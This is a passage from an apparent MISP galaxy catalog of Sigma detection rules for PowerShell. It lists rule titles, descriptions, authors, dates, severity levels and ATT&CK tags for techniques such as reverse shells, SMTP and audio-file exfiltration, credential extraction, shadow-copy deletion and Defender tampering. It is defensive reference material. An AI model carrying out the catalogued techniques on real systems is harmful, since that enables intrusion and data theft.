Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

Internal MISP references

UUID 6942bd25-5970-40ab-af49-944247103358 which can be used as unique global reference for Suspicious Get Information for SMB Share - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/15
falsepositive ['Administrator script']
filename posh_pm_susp_smb_share_reco.yml
level low
logsource.category ps_module
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use MSHTA - PowerShell Module

Detects Obfuscated Powershell via use MSHTA in Scripts

Internal MISP references

UUID 07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb which can be used as unique global reference for Invoke-Obfuscation Via Use MSHTA - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/08
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_use_mhsta.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Internal MISP references

UUID 7034cbbb-cc55-4dc2-8dad-36c0b942e8f1 which can be used as unique global reference for Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_compress.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Download - PoshModule

Detects suspicious PowerShell download command

Internal MISP references

UUID de41232e-12e8-49fa-86bc-c05c7e722df9 which can be used as unique global reference for Suspicious PowerShell Download - PoshModule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['PowerShell scripts that download content from the Internet']
filename posh_pm_susp_download.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Stdin - PowerShell Module

Detects Obfuscated Powershell via Stdin in Scripts

Internal MISP references

UUID c72aca44-8d52-45ad-8f81-f96c4d3c755e which can be used as unique global reference for Invoke-Obfuscation Via Stdin - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_stdin.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation CLIP+ Launcher - PowerShell Module

Detects Obfuscated use of Clip.exe to execute PowerShell

Internal MISP references

UUID a136cde0-61ad-4a61-9b82-8dc490e60dd2 which can be used as unique global reference for Invoke-Obfuscation CLIP+ Launcher - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_clip.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Malicious PowerShell Scripts - PoshModule

Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance

Internal MISP references

UUID 41025fd7-0466-4650-a813-574aaacbe7f4 which can be used as unique global reference for Malicious PowerShell Scripts - PoshModule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/23
falsepositive ['Unknown']
filename posh_pm_exploit_scripts.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Invocations - Generic - PowerShell Module

Detects suspicious PowerShell invocation command parameters

Internal MISP references

UUID bbb80e91-5746-4fbe-8898-122e2cafdbf4 which can be used as unique global reference for Suspicious PowerShell Invocations - Generic - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/12
falsepositive ['Very special / sneaky PowerShell scripts']
filename posh_pm_susp_invocation_generic.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

SyncAppvPublishingServer Bypass Powershell Restriction - PS Module

Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.

Internal MISP references

UUID fe5ce7eb-dad8-467c-84a9-31ec23bd644a which can be used as unique global reference for SyncAppvPublishingServer Bypass Powershell Restriction - PS Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, OSCD Community
creation_date 2020/10/05
falsepositive ['App-V clients']
filename posh_pm_syncappvpublishingserver_exe.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Internal MISP references

UUID a23791fe-8846-485a-b16b-ca691e1b03d4 which can be used as unique global reference for Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_rundll.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR+ Launcher - PowerShell Module

Detects Obfuscated use of Environment Variables to execute PowerShell

Internal MISP references

UUID 6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e which can be used as unique global reference for Invoke-Obfuscation VAR+ Launcher - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_var.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Invocations - Specific - PowerShell Module

Detects suspicious PowerShell invocation command parameters

Internal MISP references

UUID 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 which can be used as unique global reference for Suspicious PowerShell Invocations - Specific - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro
creation_date 2017/03/05
falsepositive ['Unknown']
filename posh_pm_susp_invocation_specific.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Computer Machine Password by PowerShell

The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer.

Internal MISP references

UUID e3818659-5016-4811-a73c-dde4679169d2 which can be used as unique global reference for Suspicious Computer Machine Password by PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/21
falsepositive ['Administrator PowerShell scripts']
filename posh_pm_susp_reset_computermachinepassword.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module

Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.

Internal MISP references

UUID 38a7625e-b2cb-485d-b83d-aff137d859f4 which can be used as unique global reference for Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2021/07/13
falsepositive ['Unknown']
filename posh_pm_remotefxvgpudisablement_abuse.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Use Get-NetTCPConnection - PowerShell Module

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

Internal MISP references

UUID aff815cc-e400-4bf0-a47a-5d8a2407d4e1 which can be used as unique global reference for Use Get-NetTCPConnection - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Unknown']
filename posh_pm_susp_get_nettcpconnection.yml
level low
logsource.category ps_module
logsource.product windows
tags ['attack.discovery', 'attack.t1049']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Rundll32 - PowerShell Module

Detects Obfuscated Powershell via use Rundll32 in Scripts

Internal MISP references

UUID 88a22f69-62f9-4b8a-aa00-6b0212f2f05a which can be used as unique global reference for Invoke-Obfuscation Via Use Rundll32 - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2019/10/08
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_use_rundll32.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Zip A Folder With PowerShell For Staging In Temp - PowerShell Module

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID daf7eb81-35fd-410d-9d7a-657837e602bb which can be used as unique global reference for Zip A Folder With PowerShell For Staging In Temp - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2021/07/20
falsepositive ['Unknown']
filename posh_pm_susp_zip_compress.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.collection', 'attack.t1074.001']
Related clusters

To see the related clusters, click here.

Change User Agents with WebRequest

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Internal MISP references

UUID d4488827-73af-4f8d-9244-7b7662ef046e which can be used as unique global reference for Change User Agents with WebRequest in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/23
falsepositive ['Unknown']
filename posh_ps_susp_invoke_webrequest_useragent.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Add Windows Capability Via PowerShell Script

Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.

Internal MISP references

UUID 155c7fd5-47b4-49b2-bbeb-eb4fab335429 which can be used as unique global reference for Add Windows Capability Via PowerShell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/22
falsepositive ['Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.']
filename posh_ps_add_windows_capability.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution']

Powershell Token Obfuscation - Powershell

Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation

Internal MISP references

UUID f3a98ce4-6164-4dd4-867c-4d83de7eca51 which can be used as unique global reference for Powershell Token Obfuscation - Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/27
falsepositive ['Unknown']
filename posh_ps_token_obfuscation.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.009']
Related clusters

To see the related clusters, click here.

Usage Of Web Request Commands And Cmdlets - ScriptBlock

Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs

Internal MISP references

UUID 1139d2e2-84b1-4226-b445-354492eba8ba which can be used as unique global reference for Usage Of Web Request Commands And Cmdlets - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author James Pemberton / @4A616D6573
creation_date 2019/10/24
falsepositive ['Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.']
filename posh_ps_web_request_cmd_and_cmdlets.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock

Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.

Internal MISP references

UUID cacef8fc-9d3d-41f7-956d-455c6e881bc5 which can be used as unique global reference for Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/09
falsepositive ['Unknown']
filename posh_ps_remotefxvgpudisablement_abuse.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Powershell Install a DLL in System Directory

Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"

Internal MISP references

UUID 63bf8794-9917-45bc-88dd-e1b5abc0ecfd which can be used as unique global reference for Powershell Install a DLL in System Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/27
falsepositive ['Unknown']
filename posh_ps_copy_item_system_directory.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1556.002']
Related clusters

To see the related clusters, click here.

PowerShell WMI Win32_Product Install MSI

Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class

Internal MISP references

UUID 91109523-17f0-4248-a800-f81d9e7c081d which can be used as unique global reference for PowerShell WMI Win32_Product Install MSI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/24
falsepositive ['Unknown']
filename posh_ps_win32_product_install_msi.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation STDIN+ Launcher - Powershell

Detects Obfuscated use of stdin to execute PowerShell

Internal MISP references

UUID 779c8c12-0eb1-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation STDIN+ Launcher - Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_stdin.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerShell Remote Session Creation

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system

Internal MISP references

UUID a0edd39f-a0c6-4c17-8141-261f958e8d8f which can be used as unique global reference for PowerShell Remote Session Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/06
falsepositive ['Legitimate administrative script']
filename posh_ps_remote_session_creation.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Extracting Information with PowerShell

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

Internal MISP references

UUID bd5971a7-626d-46ab-8176-ed643f694f68 which can be used as unique global reference for Extracting Information with PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/19
falsepositive ['Unknown']
filename posh_ps_susp_extracting.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Delete Volume Shadow Copies via WMI with PowerShell - PS Script

Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

Internal MISP references

UUID e17121b4-ef2a-4418-8a59-12fb1631fa9e which can be used as unique global reference for Delete Volume Shadow Copies via WMI with PowerShell - PS Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/26
falsepositive ['Unknown']
filename posh_ps_susp_win32_shadowcopy.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Tamper Windows Defender - ScriptBlockLogging

Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.

Internal MISP references

UUID 14c71865-6cd3-44ae-adaa-1db923fae5f2 which can be used as unique global reference for Tamper Windows Defender - ScriptBlockLogging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/16
falsepositive ['Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated.']
filename posh_ps_tamper_windows_defender_set_mp.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell WindowStyle Option

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden

Internal MISP references

UUID 313fbb0a-a341-4682-848d-6d6f8c4fab7c which can be used as unique global reference for Suspicious PowerShell WindowStyle Option in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Tim Shelton (fp AWS)
creation_date 2021/10/20
falsepositive ['Unknown']
filename posh_ps_susp_windowstyle.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.003']
Related clusters

To see the related clusters, click here.

Powershell MsXml COM Object

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code

Internal MISP references

UUID 78aa1347-1517-4454-9982-b338d6df8343 which can be used as unique global reference for Powershell MsXml COM Object in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, MatilJ
creation_date 2022/01/19
falsepositive ['Legitimate administrative script']
filename posh_ps_msxml_com.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Powershell Detect Virtualization Environment

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox

Internal MISP references

UUID d93129cd-1ee0-479f-bc03-ca6f129882e3 which can be used as unique global reference for Powershell Detect Virtualization Environment in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Duc.Le-GTSC
creation_date 2021/08/03
falsepositive ['Unknown']
filename posh_ps_detect_vm_env.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1497.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Internal MISP references

UUID 20e5497e-331c-4cd5-8d36-935f6e2a9a07 which can be used as unique global reference for Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_compress.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential PowerShell Obfuscation Using Character Join

Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation

Internal MISP references

UUID e8314f79-564d-4f79-bc13-fbc0bf2660d8 which can be used as unique global reference for Potential PowerShell Obfuscation Using Character Join in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/09
falsepositive ['Unknown']
filename posh_ps_susp_alias_obfscuation.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1027', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerView PowerShell Cmdlets - ScriptBlock

Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.

Internal MISP references

UUID dcd74b95-3f36-4ed9-9598-0490951643aa which can be used as unique global reference for PowerView PowerShell Cmdlets - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/05/18
falsepositive ['Unknown']
filename posh_ps_powerview_malicious_commandlets.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerShell Create Local User

Detects creation of a local user via PowerShell

Internal MISP references

UUID 243de76f-4725-4f2e-8225-a8a69b15ad61 which can be used as unique global reference for PowerShell Create Local User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ROxPinTeddy
creation_date 2020/04/11
falsepositive ['Legitimate user creation']
filename posh_ps_create_local_user.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

PSAsyncShell - Asynchronous TCP Reverse Shell

Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell

Internal MISP references

UUID afd3df04-948d-46f6-ae44-25966c44b97f which can be used as unique global reference for PSAsyncShell - Asynchronous TCP Reverse Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/04
falsepositive ['Unlikely']
filename posh_ps_psasyncshell.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Powershell Exfiltration Over SMTP

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Internal MISP references

UUID 9a7afa56-4762-43eb-807d-c3dc9ffe211b which can be used as unique global reference for Powershell Exfiltration Over SMTP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/26
falsepositive ['Legitimate script']
filename posh_ps_send_mailmessage.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.003']
Related clusters

To see the related clusters, click here.

Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

Internal MISP references

UUID db885529-903f-4c5d-9864-28fe199e6370 which can be used as unique global reference for Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/17
falsepositive ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"]
filename posh_ps_computer_discovery_get_adcomputer.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Potential Persistence Via PowerShell User Profile Using Add-Content

Detects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence

Internal MISP references

UUID 05b3e303-faf0-4f4a-9b30-46cc13e69152 which can be used as unique global reference for Potential Persistence Via PowerShell User Profile Using Add-Content in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/08/18
falsepositive ['Legitimate administration and tuning scripts that aim to add functionality to a user PowerShell session']
filename posh_ps_user_profile_tampering.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.013']
Related clusters

To see the related clusters, click here.

Abuse of Service Permissions to Hide Services Via Set-Service - PS

Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)

Internal MISP references

UUID 953945c5-22fe-4a92-9f8a-a9edc1e522da which can be used as unique global reference for Abuse of Service Permissions to Hide Services Via Set-Service - PS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/17
falsepositive ['Rare intended use of hidden services', 'Rare FP could occur due to the non linearity of the ScriptBlockText log']
filename posh_ps_using_set_service_to_hide_services.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Invocations - Generic

Detects suspicious PowerShell invocation command parameters

Internal MISP references

UUID ed965133-513f-41d9-a441-e38076a0798f which can be used as unique global reference for Suspicious PowerShell Invocations - Generic in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/12
falsepositive ['Very special / sneaky PowerShell scripts']
filename posh_ps_susp_invocation_generic.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

SyncAppvPublishingServer Execution to Bypass Powershell Restriction

Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.

Internal MISP references

UUID dddfebae-c46f-439c-af7a-fdb6bde90218 which can be used as unique global reference for SyncAppvPublishingServer Execution to Bypass Powershell Restriction in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, OSCD Community
creation_date 2020/10/05
falsepositive ['App-V clients']
filename posh_ps_syncappvpublishingserver_exe.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Automated Collection Command PowerShell

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

Internal MISP references

UUID c1dda054-d638-4c16-afc8-53e007f3fbc5 which can be used as unique global reference for Automated Collection Command PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/28
falsepositive ['Unknown']
filename posh_ps_automated_collection.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1119']
Related clusters

To see the related clusters, click here.

Windows Firewall Profile Disabled

Detects when a user disables the Windows Firewall via a Profile to help evade defense.

Internal MISP references

UUID 488b44e7-3781-4a71-888d-c95abfacf44d which can be used as unique global reference for Windows Firewall Profile Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/12
falsepositive ['Unknown']
filename posh_ps_windows_firewall_profile_disabled.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Manipulation of User Computer or Group Security Principals Across AD

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..

Internal MISP references

UUID b29a93fb-087c-4b5b-a84d-ee3309e69d08 which can be used as unique global reference for Manipulation of User Computer or Group Security Principals Across AD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Legitimate administrative script']
filename posh_ps_directoryservices_accountmanagement.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1136.002']
Related clusters

To see the related clusters, click here.

Potential Data Exfiltration Via Audio File

Detects potential exfiltration attempt via audio file using PowerShell

Internal MISP references

UUID e4f93c99-396f-47c8-bb0f-201b1fa69034 which can be used as unique global reference for Potential Data Exfiltration Via Audio File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Unknown']
filename posh_ps_audio_exfiltration.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration']

Disable Powershell Command History

Detects scripts or commands that disabled the Powershell command history by removing psreadline module

Internal MISP references

